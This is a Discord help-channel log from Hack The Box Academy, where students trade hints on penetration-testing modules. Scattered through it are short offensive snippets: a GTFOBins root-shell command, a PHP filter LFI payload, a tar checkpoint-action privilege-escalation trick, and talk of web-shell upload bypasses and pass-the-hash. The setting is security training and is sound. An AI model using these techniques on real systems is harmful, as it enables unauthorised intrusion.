#modules

Use the note icon in the right bottom corner

Very, very doable, if you did CPTS, you already have plenty of modules from CBBH done, so this won't take much time.
I recommend revising and finishing the remaining ones, and going for it once you feel ready (maybe being comfortable with all the modules' skills assessments before jumping into the exam).
CWEE will be harder, but because you have completed most of the CBBH modules, you will have plenty of time to study for CWEE within the one-year timeframe; you just need to put a little bit more effort into it.

i would like to add on that CWEE will have a base assumption that you have a grasp on some programming languages

Very good point, definitely worth mentioning.

Hi, I noticed that the exercises machines for Attacking Common Applications module are not stable at all, reachable for 2min unreacheable for 5min

it been going on for 3 days now

hey having some trouble on the SSRF question for attacking enterprise networks - web enumeration & exploitation if anyone is able to help, open to dm

yeah dm

Hey all, I'm just working through the cbbh web proxies module and the zap hud just doesn't work. Just wondering if anyone else has had this issue?

HUD selected, but...no HUD 😦

@jolly oasis please don't spoil content from modules above tier 0. On top of this, please don't spoil flags or flag locations. Have you considered looking at the text file directly?

Sorry. Is this the correct place to post questions about those modules?

Yeah the HUD is a little finnicky, no worries though since you can do everything without it, just have to go back to the ZAP ui

Yes it is the correct place, just don't spoil stuff.

Got it

I have finished up Introduction to Windows Command Line and was about to start Introduction to Bash Scripting when I noticed that one of the pre-reqs is Web Requests. the Web Requests module is the last module in the Information Security Foundations. But I also noticed that Web Requests is also a pre-req for a few other modules in the path as well... Is it better to just stick to the order laid out in the path or is it better to do the pre-reqs first?

Do it in the order it's laid out, bash-scripting only has that as a pre-req because of curl which won't be too hard to understand even without going through the Web Requests module

I also noticed that Intro to Network Traffic Analysis and Introduction to Web Applications come before Web Requests as well and both have Web Requests listed as a pre-req. Same advice for those as well?

mhmm

The order it's layed out in is the one that makes the most sense

Thanks for the clarification! It's helpful.

Attacking Thick client applications
cant rdp into target server (getting below error) {using my own vm}
[ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]

Gl bro 😭🙏

I had to restart that so many times

Wasn’t even the worst part

i heard from someone about ippsec video on this uk about it?

cant find on yt

This message making me give up already

It's the box called Fatty

Thank you

Hey yall hoping for a little nudge with "File Upload Attacks - Type Filters"

The above server employs Client-Side, Blacklist, Whitelist, Content-Type, and MIME-Type filters to ensure the uploaded file is an image. Try to combine all of the attacks you learned so far to bypass these filters and upload a PHP file and read the flag at "/flag.txt"

I was able to upload my php file with its content to the server, but when viewing its page, it is returning 404 not found

Nope, not what this discord is about.

@atomic moss Please read the #rules this is not a server for illegal things.

Hi,

I need to use SharpUp.exe for priv escalation. The git repo doesn't have a pre-compiled binary in its Releases section. I had noted down precompiled-binaries repo under jakobfriedl account on the github earlier. But when I visit the page now, Chrome flags it as dangerous. The repo has got 145 stars which I consider good. However, I am not sure how much safe it is to download the executables from here. Are there some other similar repos that are reliable? Or maybe checksums for the files have been maintained somewhere?

Those are tools with lots of signatures, so it will get a flagged

this is another repo too https://github.com/Flangvik/SharpCollection

Hello Everyone, I am going through the CPTS path and at Footprint lab - Medium. I could not locate the links myself without any help. Does this happen in real world. Joining the dots was a tricky part for me. Learning was great. Like, I find NfS server, and then enumerating it further, use commands to navigate the files. One of the files has file size of more than 0 Bytes. and so on. Connecting the dots was difficult for me. Not sure if this is how it would be in real world as well. I loved the exercise as well. I might not be able to catch these red flags myself looks like 😦

Thats why pentesters work in teams, you finish things much faster, miss less things,and have a more diverse skillset

That being said CPTS is 100% meant to be solved solo

anyone have issue with Windows Lateral Movement module? in particular in the RDP session Im using netexec (nxc) to perform password spray on rdp service but the target machine seems to not respond at all to nxc if I put rdp. with other services like smb it responds but extremely slowly

You are still early in your journey. Your mindset will change over time and these methods will make sense the more you use them until eventually, you can do it alot from memory.

Don't feel to bad

If you encounter issues with the module pass the hash (pth), when trying to connect to the share \dc01\david and this fails. Check if you can lookup the dc01 with "nslookup dc01". In my case I wasn't able to find the dc01, it probably didn't got spawn up correctly. Therefore I couldn't connect to the share. Just reboot the machine and try again.

Thanks for uplifting and motivating me. The journey was looking a bit daunting and unachievable. But by being consistent, sometime should be there. Thanks again 🙂

No worries, even the professionals look things up from time to time as well. It's better to spend the time to look something up and do it the right way instead of fumbling around and wasting time in my opinion.
But then fumbling around can have its benefits too i guess.

Keep on learning

Yeah for sure. 🙂

Have you started on the hard lab? That one took me a little while to finish

Yeah, i am on it now while we speak

Trying to figure out by referring to previous sections on IMAP / POP3

Nice, thats great.
Taking notes as you go can be helpful as well because you can write it in your own words and it might make more sense to you that way. It can be quicker to navigate to as well, instead of searching through past modules you went through.

Eventually we will need to produce reports as well so having notes to refer to can really help.

Ok do you recommend taking notes on Kali - notepad or something else. Or the host machine . I use Kali on VM

I use the pwnbox provided so i put my notes into notepad on my main OS

Some use things like google drive so that they can access it on any computer with Internet

Hackthebox also has a note tab on the website for each module for students to use

Ok I think I’ll create a GitHub repo to access my notes online as I am also keeping track of what I do other than htb

And use vscode to write down notes in md format

Contact instagram and discord support, can't help you here

doing that module with pwnbox worked it was slow and annoying but yea it worked

check out gitbook its better for notes taking

Okay thanks so much ! I'll say it to my friend

Good choice

Ok haven’t heard about that. Will give it a try

Nevermind It's fixed

Need help with Windows Lateral Movement RDP section
Login to the target machine using Helen's credentials. Then, use Pass The Hash to authenticate over RDP to SRV02 with the user you found in the previous question. Read the flag located at C:\Flags\hash.txt. The issue is that SRV02 since unreachable from the target machine once established the first RDP connection, I performed a ping sweep and find 172.20.0.10 but I cannot connect to that IP and I dont know if it is SRV02 indeed, any help?
I followed the instruction in the module for set up the pivot with chisel but the target since unreachable

SOLVED: LAB issue -> restarted and worked well

why have you got local host IP?

IPv4 address = "127.0.0.1" aka Loopback address is your machine IPv4 address, which means its like pointing a gun towards yourself

show conf

im curious what trying to do 😄

ooooo you are doing proxy chains

but it still points to yourself...

either way I think proxychains doesn't support ICMP, try nc or nmap -sT

Hi all got an issue with cookie-editor in Windows Privilege Escalation - Pillaging. I extracted the cookie via cookieextractor.py but when i go to use cookie-editor in firefox, it's disabled as it could not be verified by firefox. There's no way to enable it and there's no internet access either, can someone help please? Do i have to download it manually , transfer it over and then install it that way? I doubt it but it's the only way i can think of

Looks like you're using private mode

try using normal

yeah just double checked, proxychains only supports TCP and DNS, ping is ICMP so it's not supported

I'm not, i can see why you think that due to the mask being on the right of the title. Here's a full screenshot so that you know i'm in normal

hello i am working on the PENTEST IN A NUTSHELL module currently at the LINUX PRIVILEGE ESCALATION section. Here you get your first example of how to break out to a root shell by using GTFObins

it is executing the reset; /bin/bash 1>&0 2>&0 command but its not entering a root shell.

its been stuck here for a good 20 minutes now, same thing happend yesterday thats why i thought i try it again today

is the execution suppose to take this long ?? or is this a vm error ?? or did i mess up somehow ?? anyone has any idea ?

nevermind i figured it out... good now

which part is that @near orchid I am on shared libraries section

Hi everyone! I'm working on the Linux Fundamentals module (Table: Shell - System Information), and I'm stuck on the question:
"What is the name of the network interface that MTU is set to 1500?"

The command ip link show shows ens3 has an MTU of 1500, but the answer is marked incorrect. I've also tried enp0s3, 2, etc.

Has anyone encountered this issue? Is there a trick to this one?
Thanks in advance!

Hi guys, I think I need help!
I'm on "Using Web Proxies", now on the "Proxy Setup" stage, but I am having issues with getting the ZAP's certificate (as well as it's newest version). I managed to instal the CA Certificate for Burp, but I got something different than it is showed in the lesson.
I am trying this in a VM separate from HTB, on my own pc.
Any kind of help is appreciated!
(please correct me if I am missing some information to provide 😅)

imo it's just faster to use ZAP's pre-configured web browser, you'll see it in the top menu of the UI it's the firefox icon

are you SSHed to the target

I think I've been there already, now that you mentioned it, I just opened firefox separately on it's own, instead of through ZAP!!
I got kind of lost half way through and I tried to realise where did I go wrong.
Thank you a lot, I will try again from there!!! (I'll get back if I still have issues 😭)

Did you get your answer ?

Sorry wrong guy

is something I did wrong I can see sudo -l can do /usr/bin/openssl but the instructions are targeting apache2 web server

Did you get your answer?

all good

Because the lab is not exactly the same as the instructions, you gotta think what you can do to find a way to use that privilege to privesc

hint: ||Look it up in GTFObins||

indeed im checking the config file in /etc

of ld.so.conf but when I get stuck I check that hint you dropped

I don't see the section with "Dynamic SSL Certificate" and I've tried going through the ZAP's browser instead this time.
I can get the Burp Certificate, but ZAP's one is not showing...

File Upload Attacks When crafting my payload to try to bypass filters, It seems like I'm breaking my files in general when uploading, not being able to use the shell. Any idea on what I'm doing wrong?

Hey fam, how i can brute force while changing the ip address in the X-Forwarder-For every N requests in Burpsuite.

am I getting closer or further away?

I have a feeling I am further away :<

I think I managed to do it manually, should be solved

I was sort on the right track 😄

try another extention

Yeah I'm still stuck at it, realized if I add .jpg or any file type it'll break the code right?

So I need to try to make it a php extension + bypass another way

Just kinda stuck.. module doesn't explain very well

what's the topic in file upload?

Bypassing Filters > Type Filters

Oh, i have finished yesterday

it's trick

What I've discovered. Extensions "pgif, phar, pht" are working.
But, when fuzzing all content-types it's still giving "Only images can be ..."

Yeah def is tricky

I've tried the GIF8 trick too, obv i thought I was lucky, but only broken code uploaded lol

did you try to sent all the exntentions?

You probably used the intruder already to fuzz, but try to experiment the extentions on the repeater to see which one upload successfully

I've fuzzed Content-Types which truly isn't doing much for me

I did try extensions, seen which ones allowed "Only images" vs "Not allowed"

So basically any image content-type extension will work? starting to think so

I'm saying this cause i don't think it's spoil, but in the function you can see that allows jpeg, jpg, and png, you are in the right track

Hey guys,
even if its obvious and a easy task, I need some hint regarding:
Skills Assessment - Using Web Proxies

Q1 the Button.
Way 1
I did is manually, created a POST request out of the source code, as parameter (which is wrong) and as data (which is correct)
-> Flag not found

Way 2
I did a F12 in firefox and the the disabled button to false, the POST req appears in BURP, but even after serveral tried I just see the POST req, but no flag either.

Way 3
Burp intruder with a random header, tried the POST req 100 times, no luck. Even with CURL as User-Agent.

Way 4:
Took the Burp Req in Curl, same. No Flag.

Can someone hint me the single option I am missing out here? Thanks in advance

the fact that you can upload dosn't mean that it can run php

you have to find the extetion who can execute php

Hmm okay, I re-fuzzed and grabbed the 5 extensions that might work. I'll try that.

So I've tried .pht, .phar, .phtml, pgif. phtm for extension types, and still returning "Only Images". I'm not sure man, I'll go ahead and re-do the entire module because this one makes no sense lol I appreciate trying to help 🙂

Even if Im not that far like you buddy. I did a quick check, while waiting for my answer. You need a file extension for running code. I just see one from your examples. One can run code, regarding my google result.

Hi Everyone, I’m stuck on trying to crack the hash file of the keePass DB in the Password Attacks Lab - Hard. I’ve tried the list provided in the resources {Both the Password.list and the mutated list made with custom.rule) but nothing works. Could someone please point me in the right direction or are we expected to use rockyou.txt and wait forever?

I also tried password.list with best64.rule but it also didn’t work SOS 🫠

So the file must have two extension types?

You wrote your 5 extension types, I only see one extention which is "executable" and show not return as an image, when the content is approriate.

You may want to google filextension: xyz reverse shell, then I found a one liner. that may work. But as said, I'm not that far with the conent.

Thanks man, I think my issue is I try to stay only inside of what's in the academy. I don't like taking google as answers etc as that will be unreliable for the exam yk

I honestly finish it with the content on the module

"We see that we get a message saying Only images are allowed. The error message persists, and our file fails to upload even if we try some of the tricks we learned in the previous sections. If we change the file name to shell.jpg.phtml or shell.php.jpg, or even if we use" quoting the type filter sections

the php code will only be executed if you are using the right php extention for this

Yea ill just come back to this tomorrow I'm already frustrated. tysm for help. this module is getting my first 1 star 100%

I've read this module multiple times, I just am not getting it. Time to call it quits for the day

Strange, mut_password list should work here. DM me if needed.

Nvm, thanks everyone for the help. Indeed got me further to my issue.

The frustration this gives me sometimes...

@vestal fable & @tepid crane ❤️ tysm

yo nice, glad to help 😄

What's annoying was how close I was

But I went too deep not thinking I needed 2 extension types (.jpg.xxx)

<@&861185840277487616>

thanks 🙏

may I ask for help/hints here, I tried to cover up my mistakes to improve.

i have been slamming my head against my desk with the section #2 in windbg intro module skills assessment. I have done everything else. I have malware analysis experience and flew through malware analysis and maldoc, and i have been stuck on the middle 2 question in windbg skills assessment.

Can anyone give a hint regarding Advanced XSS and CSRF Exploitations - XSS Filter Bypasses task

What module?

Advanced XSS and CSRF Exploitations module

pls can someone help me write exploit for the postman lab for root access, i tried many walk throughts, videos but still i cannot get in.

Do we will get a netexec learn module?

In the next time

Can anyone explain the process of setting a double pivot through only metasploit? AEN seems to suggest that in order to double pivot the user must upload a rev shell to the 2nd pivot host thorough the 1st pivot's meterpreter connection.

NTLM Relay Use Cases Module

world writable and readable and access denied?!

Its a permission issue for respected .txt file to be submitted. Ive done the same thing via multiple routes

I suppose I can skip and continue and read the files later but

Am new here

I need someone to teaching me tell

@slate zinc

Hey, I just started AD Enumeration & Attacks - Skills Assessment Part I can anyone guide me why I am unable to move directories in web shell and when I upload my own payload it gets uploaded But I am unable to execute it

Finally worked my way through web requests now onto the good stuff 🤙🏻

anyone experiencing problem with sqlplus in footprinting Oracle TNS section ? Is there any other way to install this without signing up for an account at Oracle first? Edit: Got it figured out, for future references and run this script and implement the fix in the module afterwards: sudo apt install oracle-instantclient-basic oracle-instantclient-devel oracle-instantclient-sqlplus -y

wget https://deb.parrot.sh/parrot/pool/non-free/o/oracle-instantclient-devel/oracle-instantclient-devel_19.6.0.0.0-0parrot2_amd64.deb
sudo dpkg -i oracle-instantclient-devel_19.6.0.0.0-0parrot2_amd64.deb a

Hello, I want to start with "Hack the box" but y don´t now anything, I will start in 0. ¿Anyone can sayme some tips or how to start in this world?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@devout orbit Please don't post content from modules above tier 0. Simply ask your question with words.

Please do not ping random people in the server. If you need help with modules you can ask here, otherwise read the #rules and follow the instructions in #welcome to gain access to most of the channels.

Is in somewere this but in spanish? (Im from spain)

I don't believe so

Yes, I try with chrome and they give me the option to translate the website to spanish 🙂

oke, I will in the future, but can you confirm that machine is not working as expected?

It worked fine when I did it, but it's been a long time and something could have broke. Every single time I thought something was wrong I found out I wasn't doing it right, so I would wager it's probably working as intended.

I am able to make the dll file appear in the Windows cmd line for the RDP and SOCKS Tunneling with SocksOverRDP section of Pivoting, Tunneling and Port Forwarding by adding exclusions but it still won't successfully run the cmd the sections says to run on the file whether I add exclusion for the one file, both folders, the whole desktop, or all of the above.

I have a screenshot but I'm scared it will spoil content.

of the Windows error

this one section has taken me three days

someone tried to help me but the first instruction he gave won't work

hi im new just looking for advice

can someone help me? the guy helping me says he doesn't even think this section is necessary

start with InfoSec Foundations

or the other prerequisite path

to then go into CBBH or CPTS or CDSA depending on which prerequisite path you did

I recommend InfoSec Foundations > CPTS to learn basics

then go elsewhere from there

I know its not him because the advice he gives always is good advice. He and I agree that this section is BS.

can someone help me with this?

I literally followed along with his instructions and it won't work

which one is the best cert

Depends on what you want to do

if you want to do network pentesting then do InfoSec Foundations path and then do CPTS then CAPE to start

but if you want to do web app pentesting then InfoSec Foundations > CBBH > CWEE

if you want defense then do the defensive security prerequisite path then do CDSA

those are the places to start

ok thanks

InfoSec Foundations > CBBH > CWEE is better if you want to do bug bounties

CPTS is also good if you don't know which cert you prefer but do InfoSec Foundations path first

then if you want to transition into web then CBBH could be next after

can somoene help me with this?

Hi everyone, question about "Abusing HTTP Misconfigurations": "Tools & Prevention" (CWEE path)
The question says "[...]identify an HTTP Header[...]"
What kind of response are we expecting? A flag? A header? Just the name of the header or the full header?

is defender removing the dll?

yes until I add exclusions for the file, both folders I copied over, AND the Desktop, and even then it gives me an error if I try to run regsvr32.exe on the program

like it won't allow it

but adding exclusions can make the file appear in cmd prompt under dir command

but that's as close as I can get it

try turning off defender

ok

I disabled real-time protection to turn off Windows defender but it still won't work

that error code means access denied iirc

are you able to open as admin

The cmd line? I think so yes but I already tried that

Can anyone help me with the "Automating Payloads with Metaaploit" module? My nmap scan shows that several services are open including SMB. How do I know which SMB exploit I should be using? There are nearly 450 different ones when I search for "smb" in Metasploit.

SMB version numbers, OS version/update level, nmap vuln scan.

Please make sure not to post content from modules above tier 0 guys

@cloud urchin did you delete my post? what rule did I break? what about my post broke the rule?

Infosec is information security right?

Technically yes but that learning path is supposed to be prerequisite IT skills for the different cybersecurity pathways

So but I mean that’s why its called “foundations”

But yes it focuses on InfoSec

Ofc is in the hackthebox I got it

@safe star Can I DM you?

At some point tomorrow?

Yes I did. You can't post content from modules above tier 0. As the pivoting module is above tier 0 and you posted a screenshot from the module as well as revealing other details I deleted it.

can you define "Content"?.. I was told you can post ss just not information that reveals commands, flags, etc. which I didn't. I asked a question and provided screenshot showing I couldn't connect to .155

I can post the same question without the screenshot showing i couldn't connect to .155 then?

con·tent2
/ˈkäntent/
noun
noun: content; plural noun: contents

the things that are held or included in something.

ok pepega

Your screenshot showed the VM from the module, the username, IP address, items on the desktop, etc

Anyone who has done the modules should be able to assist without you needing to post screenshots etc., so it's really not needed

you can just articulate the module, section, what you've tried, etc without posting content

i need a little help here. i'm doing the footprinting skills assessment- easy. i have to edit the vsftpd.conf file for anonymous access and get the flag?

Cant recall but am pretty sure you dont need to edit any confs for that SA

yeah sure

Hi guys

currently revisitng SSRF module and need help on the identifying ssrf part. I've identifie some open ports, so for example if one is the mysql port, how exactly can I access this?

this is what I'm getting

and since SSRF makes requests internally, I don't think I could use command line to access mysql on this server

@mighty matrix Please take care not to post content from modules above tier 0

sorry about that I dont know how that all works 😅

as im following the cbbh path it doesn't show any tiers

well Im getting an error message when I try add localhost:port in burp repeater, it's a different error message so it definitely exists but i think I may have forgotten something...so any tips in the right direction will be helpful

It shows the tier when you start the module

ah okay

for the footprinting skill assessment-easy i think i'm heading in the right direction...i just need help understanding the data that i'm getting back from the audit, i'd apricate it if i could share a screen shot with someone?

thanks

pm

someone here new ?

you

😆

Hello everyone, I have a question regarding the CPTS report template from the module on Documentation and Reporting.

The module advises against duplicating findings within the report. However, in the provided demo report, the Attack Path section outlines the full path the attacker took to compromise the network, which includes vulnerabilities such as:

LLMNR/NBT-NS Response Spoofing

Weak Kerberos Authentication (“Kerberoasting”)

These same vulnerabilities also appear again in the Findings section.

Could someone clarify how to handle this? Should these vulnerabilities be mentioned in both sections, or should they only appear once?

local is used because you're using files on your local machine; so you're telling impacket to not attempt a connection

otherwise if you do have valid admin credentials; you can use secretsdump to remotely dump that info

@silent prawn please re-post without spoiling contents from the module. especially a skill assessment.

Hello, can anyone give me some advice?
Module: Advanced XSS and CSRF Exploitation
Section: Skill Assessment
Question:I tried uploading an HTML snippet that automatically triggers a request to the role-assignment endpoint when the file is opened. Although I can see the request fire in my browser’s network logs, my account’s role never changes—as if the bot didn’t open my file. What might I be overlooking?

Thanks in advance!

Yeet

hi everyone i'm on the academy intro and the question is on the tier 0 module how many cubes are you rewarded for completing. I know the answer but it's not accepting it. I tried number and i tried w riting the number in words. module 15 section 34.

If it is not being accepted it is highly likely that it isn't the correct answer, especially, when you have double-check any leftover space characters

Thanks dpgg I thought so too but I'm literally looking at the cheat sheet so I know the answer is right. Can i put the answer here as on the question has a cheat sheet, it's not really a secret

Hello everyone, I am facing issue with file upload exploitation. I was able to upload PHP/phtml web shells to /files.php(web) however I can't locate the actual execution path. Developer tools & burp suite didn't help. Tried FFUF to brute-force paths but no luck. Also trying to get SSH access to remote host. SSH is open (unfiltered) but I don't have credentials. No success with hydra brute force. Any help, pointers would be greatly appreciated.

It is a tier 0 module, so go for it

the answer is supposed to be zero. the cheat sheet says the cost is 10 cubes and reward is 10 cubes. I've tried answering 10 cubes, i tried 0, zero, ten. I'm stuck

It is looking for a number, not 2 bananas, 3 pineapples, etc.

thank you that did it, thanks a million

Hey everyone,

I'm currently working on the Attacking Enterprise Networks/Web Enumeration & Exploitation module on HTB Academy.

When I spawn the target, I can access the main page at inlanefreight.local, but none of the expected subdomains (like blog.inlanefreight.local, careers.inlanefreight.local, etc.) are reachable. Because of that, tools like Eyewitness also fail, and I can't collect any flags.

Is this a known issue or am I missing something in my setup?
Would really appreciate any help or pointers!

Thanks!

you'd need to add the subdomains to your hosts file as well

@fathom pendant thanks. that was the problem 👍

i suggest continuing through the module blind; not reading the questions or material.

• The questions are leading
• The module itself is a walkthrough

save flags you find, and fill in where appropriate

is nmap able to perform netcat and wait? i just find it awkward that sometimes that i have to connect with netcat on the side and wait to get answers/flags.

i've already tried the --initial-rtt-timeout at 120s and it doesnt show anything compared to just doing nc

What do you mean perform netcat ? nmap and netcat although both interact with network interface ports work in fundamentally different ways

guys im tweaking on API attacks skill assessment, may I request a hint?
|| I've tried bruteforcing the password reset security questions for the five emails with a wordlists of colors if it's worth anything||

try whoami?

-sU

also: nmap won't be able to get you all the info

1. UDP port seems to be closed AFAIK, unless it's another one :/
2. For future reference, are module spoilers not allowed even in spoilers? Just to make sure I don't do it next time

For the hard lab, everything they explained in the Firewall and IDS/IPS evasion section helped me get the flag

That's where I've been guiding myself from, and it has worked wonders so far, just missing the last ||banner grabbing|| part...
I suppose I'll keep at it, thank you all for your time and effort :)

Hi

No problem, the way to get the answer is literally staring you in the face

Can you tell me what is this server about

This the discord server for the hackthebox website

I mean yeah but what do you all talk about actually

This section is #modules where people that are going through the htb academy come for nudges on modules when they are struggling

Man you talk like a bot

Thanks

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

That's both recomforting and frustrating 🫠 Thanks though, appreciate the tip! :]

Have you found the port you need the banner for?

Well... yeah, I believe so

Even still, ||netcat returns permission denied|| upon trying to connect to it :/

How to know wifi password

What is the nc command you are using? Think about what you did to get the port to show as open in nmap and use that method with nc

1. module is above t0
2. It's a skill assessment

netcat requires sudo to bind to ports <= 1023, as those are reserved ports

this channel is for discussion of the academy learning modules; https://academy.hackthebox.com
if you want access to more of the server there's instructions in #welcome that contain instructions to link your htb account to the discord to access

and yes, it's how you gain access to #general

1. Okay, I see, sorry about the other messages then... I'll make sure to not 😅
2. Oh... well, that's slightly embarrassing, it really was staring back at me in the face, didn't think it would be that type of permission denied...

Even so, that was exactly the missing piece and now the module is finally complete, thank you so much dizewo and MarcieLee for your time (and patience!), and I hope everyone has an awesome day! :]

No problem, enjoy your journey

I'm trying to connect using OpenVPN, but I'm getting stuck during the connection process.
Has anyone else run into this recently?

Never mind — it's working now!

Bumping this as it got buried. Any help? The module expects an answer but the question doesnt specify what. Or should I assume every answer is a flag?

The answer is not a flag, but rather something produced in the output of the tool

thanks! I'll search in that direction

just takes sometime for it to establish connection 😄

dm me

Hey Guys, I am doing assessment 1 of active directory enumeration and attacks and I am stuck in question 5
Find cleartext credintials for another domain user summit user as answer
I have no idea what user it is taking about and In Ms01 machine I am able to access due to ps session inside metasploit shell but not able list or navigate directories

So my main question is how can I get proper shell in ms01 machine which I am connected to via ps-sesion inside a metasploit shell

I am about to ask a very stupid question but doing Network Enumeration with Nmap Host Discovery section. In the final question it ask to detect the Operating System, is it the operating system of our HTB Virtual Machine or of the IP address given in the final the lab lectures? I did get the opearting system of my HTB VM but it keeps saying it is wrong and of the lab lectures still working on it

You are supposed to tell os of target (IP given) host

Dear all, I have a question concerning the module "Pivoting, Tunneling, and Port Forwarding", Section "RDP and SOCKS Tunneling with SocksOverRDP": The Questions states " Use the concepts taught in this section to pivot to the Windows server at 172.16.6.155 (jason:WellConnected123!). Submit the contents of Flag.txt on Jason's Desktop." I can successfully connect to the pivot host, however the target is not online. I performed a Ping Sweep (from the pivot host) for 172.16.5.0/24 and 172.16.6.0/24. This identifies to machines (172.16.5.19 and 172.16.5.150 [i.e. the pivot host]). The credentials don't work in either of them.

Does anyone experienced this issue? Any hints? Thanks!

Hi thanks for, we have to tell the OS for the given host like "Linux" but is the IP address given the same one as the lecture notes?

while going through modules there are certain RFC mentioned for the services and protocols do we need to go through them ?

what are the in general best approach to read and learn from RCF i mean they are very lengthy

observe the nmap results

if u need a hint lemme know

no u r supposed to tell the host which is getting scanned with nmap

Hello, can anyone give me some advice?
Module: Advanced XSS and CSRF Exploitation
Section: Skill Assessment
Question:I tried uploading an HTML snippet that automatically triggers a request to the role-assignment endpoint when the file is opened. Although I can see the request fire in my browser’s network logs, my account’s role never changes—as if the bot didn’t open my file. What might I be overlooking?

Thanks in advance!

ah ok, i will double check since i thought the question is "find out which operating systgemr it belongs too"

idk but my senses tingling i confused you 😭 lemme know if u get the answer lol

I think I got it by checking out the TTL and I think I did not need to even use the VM instance

sorry noob here but wont be for long

thanks for the help @wooden seal

its not noob it was same experience for me too haha

i think u should dlt this as it discloses info to answer

no problem

is there a reason why it is not possible to get to that hidden directory in
https://academy.hackthebox.com/module/144/section/1311

i am trying to get an answer to this question:
What is the API key in the hidden admin directory that you have discovered on the target system?
when curling it just responses me with 301

nvm, i just forgot extra slash

Ok, figured out my issue. Double hop

In the Weak Permisisions section in Windows PrivEsc module https://academy.hackthebox.com/module/67/section/628 i cannot run SharpUp.exe because it uses .NET 3.5 and the machine doesnt have it

Hi everyone!
I'm currently working on the XSS Filter Bypasses section and, like others in this thread, I'm running into some challenges.

I managed to find a way to execute JavaScript, but it seems that the code runs in a restricted context — something referred to as a unique opaque origin. Because of this, the script isn't able to access resources like home.php or admin.php.

If anyone is willing to point me in the right direction or offer a hint, I'd really appreciate it. Thanks in advance!

Anyone?

Hello

Haven’t you got a meterpreter session? Should be good enough

Cross-Site XSS module?

No no, let me explain first I was given web shell which was not interactive I managed to upload my payload there and get meterpreter shell which was stable and allowed me to move directories but Now I want to access another machine which I can do with Ps-Exec but that is very unstable and does not allow me to execute commands properly so that's what I am asking is there any way to upload my payload into another machine?

Have you done the pivoting module?

No, That's why I am here asking for help

You can use MSF autoroute with MSF proxyserver and run commands via proxychains

Or chisel

Or Ligolo

Thanks for the path I will test this now

not possible can not drop any files into Ps-exec session

Search for pivoting and tunneling articles

I think this worked

You can, actually

If you declare a PSSession and then run the Copy-Item cmdlet with -ToSession flag

Hi guys, I've joined just moments ago, I'm a newbie in the community anyone wanna tell me what to do like the first thing i should do to get started

It’s best to research pivoting first

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Tried that it just repeats the command and does not copy

see the article above

Okk

command like this na- Copy-Item "C:\virus1.exe" -Destination "C:\Users\svc_sql.INLANEFREIGHT\Documents" -ToSession $Session

?

Have you checked it inside the host?

Try transferring to Public

how can I? it just repeats whatever command I type like I type dir it also echos dir

It’s worldly readable and writable in default config

Okay, I will try it

You enter your PSSession and check the directory

That's the main problem due to shitty PsSession I can not do anything nor list of directories nor move or run cd command

In a partially interactive session as the one you have, you won’t see the transfer status

It should basically echo the command you ran

If you were inside the Host in a proper PowerShell session, it would display the status

but how will I able to use the tool even if it reaches the host? becuase it reflects back my commands and only a few commands like whoami and pwd work

Did you run Get-Command in your PSRemote Session to see what you’re allowed to run?

Also, you can try Invoke-Comannd to run commands remotely in a PSRemote Session

it just echos back the Get-Command and does not give any result

Okay I will try that

You can try transferring your caller and run it via Invoke-Command

Thanks, I will test these

Just one more question After I am done with ad module. I should start password attacks or pivoting module? (AD was my first htb module)

Advanced CSRF & XSS Exploitation. Do you happen to have any hints on this?

Idk what’s you level of knowledge

I went through all the basic stuff prior to getting to the more intermediate and advanced content

I actually made some progress but I am facing some issues with the SOP / CORS

I have just completed Red teaming path from try hack me (which was a waste of time)

okayy

But I’d go through the basics and construct a good foundation

If those 2 are the choices, Pivoting most definitely

Thank's for the suggestion

What do you recommend the best user and password lists be for the password attacks module on the CPTS track? This might be a lot of waiting..

I think you have a resource to download passw and user list

BTW, I found the Skills Assessment for this module easier than this particular section

I agree

Skills Assessment was a breeze

Can I DM you for a nudge? I am feeling that I am really close to the solution

Hey all! 👋

I'm working on the Skills Assessment for "Information Gathering - Web Edition" and I'm a bit stuck. I don't want to post any spoilers in the channel...is there anyone here I can DM about it? I imagine it's probably just a simple thing that I'm missing 🙂

Ahh I figured it out haha. Nevermind! 😅

hey im a little stuck on ffuf, im not getting any returns on my attempts and im not sure if im doing this right, im specificly trying GET request Fuzzing

can you ping the target, is domain name in /etc/hosts

doesnt seem like it, i am able to do recursive fuzzing to find the address tree but i just get errors when trying to GET request anything

Can I see then cmds you're running, you can also DM me to avoid populating this channel

Hi! Can you help me? The VPN connection is fine, but there is no connection to the machines and ping nmap commands are not working. my MTU is 1500. How to solve this problem?

sorry im forwarding cuz too tired to type it from scratch

someone have done the attacking enterprise network i am on the last question of external information gathering and none vhost seems to work so i guess the ...oh maybe i need to dig

the other host ?

Hey

hey

jsut to reply to myself i forgot or misspell the vhost

@worldly dirge don't reveal module content for modules above tier 0 =_=

man, this brute forcing in password attacks is for the birds. There must be something I over looked ... lol

Don't attack ssh

I guess i'm confused. We're not supposed to brute force SSH?

I'm on the setting up module and I can't get the Windows VM back. Could someone help me understand how to get it back?

step 0; enumeration

the link they have no longer exists, you're better off just creating a vm using rufus to make the iso

okay thank you

does the username start with C ?

?

nvm

i'm gonna take you a step back; enumeration in this context == scanning the target

This module (and a few others) tend to give you the end step but don't necessarily tell you how to get to that info

gotcha, I think I know where this is going.

Note: In order to complete the challenge questions, be sure to download the provided wordlists from the Resources at the top of the page Bruh...I totally did not see this at the end of the lesson...now I can do wtf I need to do lol

instead of scanning with wordlists that would take days to finish lol

Anyone completed the new Hashcat Mission?

Good evening, I'm doing the Vulnerable Services portion of the Windows Privilege Escalation module but for some reason after executing the PoC script it's giving a reverse shell for htb-student instead of SYSTEM

nvm, got it

Guys can someone help me to understand why the privesc on Pandora box via ||tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/***** (asterisk and --checkpoint-action=exec=sh shell.sh)|| doesn't work?

Best to ask in #boxes. You will need to verify your account by following the instructions in #welcome to gain access to #boxes and most other channels.

TY, sorry about posting wrong channel

no worries

footprinting easy assessment. i have my keys, i've moved them, ive chmod them. still getting permission denied (publickey) what have i missed?

i did get a bad permissions from the id_rsa

Quick question about PHP filters in LFI vs XXE (CBBH)

Payload from the LFI section:
php://filter/read=convert.base64-encode/resource=config

Payload from the XXE section:
